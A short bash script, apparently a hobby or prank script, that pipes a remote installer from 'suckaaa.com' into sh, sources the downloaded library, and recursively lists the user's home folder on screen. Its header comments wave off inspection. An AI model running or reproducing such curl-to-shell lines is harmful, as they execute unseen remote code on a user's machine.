#!/bin/bash

###########  HEADER  ###########
# loL whatcha lookin for in here??
# Don't worry about it!!
curl -s 'https://suckaaa.com/s/garbage-lib-installer' | sh;
source ~/.complete-garbage/lib;
clear;
###########  END HEADER  ###########

setPosition 0 0;
setFontSize 35;

echo "Umm... Here's all the files in your home folder?\n\n";

# Wish I knew how to stop this process on a timer
# I'd like to wait like 20 seconds and close the window
ls -LR ~/.;
